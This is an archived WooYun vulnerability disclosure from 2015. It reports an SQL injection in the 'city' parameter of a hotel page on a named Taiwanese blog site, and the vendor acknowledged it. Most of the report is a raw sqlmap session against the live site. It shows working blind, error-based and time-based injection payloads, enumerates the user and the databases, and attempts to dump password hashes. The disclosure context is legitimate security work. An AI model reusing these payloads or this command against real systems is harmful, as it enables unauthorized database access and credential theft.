乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-31: 细节已通知厂商并且等待厂商处理中 2015-04-03: 厂商已经确认,细节仅向厂商公开 2015-04-13: 细节向核心白帽子及相关领域专家公开 2015-04-23: 细节向普通白帽子公开 2015-05-03: 细节向实习白帽子公开 2015-05-18: 细节向公众公开
RT
[root@Hacker~]# Sqlmap sqlmap.py -u "http://chi.gogoblog.tw/hotels_city.php?city=kaohsiung&Page=1&p=new" --dbs --passwords --current-user --current-db --is-dba sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and fede[*] starting at 13:53:53[13:53:53] [INFO] resuming back-end DBMS 'mysql'[13:53:53] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: city Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: city=kaohsiung' AND 3934=3934 AND 'uvNB'='uvNB&Page=1&p=new Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: city=kaohsiung' AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x716c626571,(SELECT (CASE WHEN (9431=9431) THEN 1 ELSE 0 END)),0x717a746971,FLOOR(RAND(0)*2))x FROM INFORM Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: city=kaohsiung' AND SLEEP(5) AND 'NMSk'='NMSk&Page=1&p=new---[13:53:54] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0[13:53:54] [INFO] fetching current user[13:53:54] [INFO] resumed: chiblog@%current user: 'chiblog@%'[13:53:54] [INFO] fetching current database[13:53:54] [INFO] resumed: chiblogcurrent database: 'chiblog'[13:53:54] [INFO] testing if current user is DBA[13:53:54] [INFO] fetching current user[13:53:54] [INFO] heuristics detected web page charset 'utf-8'current user is DBA: False[13:53:54] [INFO] fetching database users password hashes[13:53:54] [WARNING] the SQL query provided does not return any output[13:53:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[13:53:54] [INFO] fetching database users[13:53:54] [INFO] the SQL query used returns 1 entries[13:53:54] [INFO] resumed: 'chiblog'@'%'[13:53:54] [INFO] fetching number of password hashes for user 'chiblog'[13:53:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:53:54] [INFO] retrieved:[13:53:55] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..[13:54:04] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[13:54:04] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads[13:54:04] [WARNING] unable to retrieve the number of password hashes for user 'chiblog'[13:54:04] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database tab[13:54:04] [INFO] fetching database names[13:54:04] [INFO] the SQL query used returns 2 entries[13:54:04] [INFO] resumed: information_schema[13:54:04] [INFO] resumed: chiblogavailable databases [2]:[*] chiblog[*] information_schema[13:54:04] [INFO] fetched data logged to text files under 'E:\INJECT~1\SQLMAP~1.4\Bin\output\chi.gogoblog.tw'
null
危害等级:高
漏洞Rank:15
确认时间:2015-04-03 02:15
感謝通報
暂无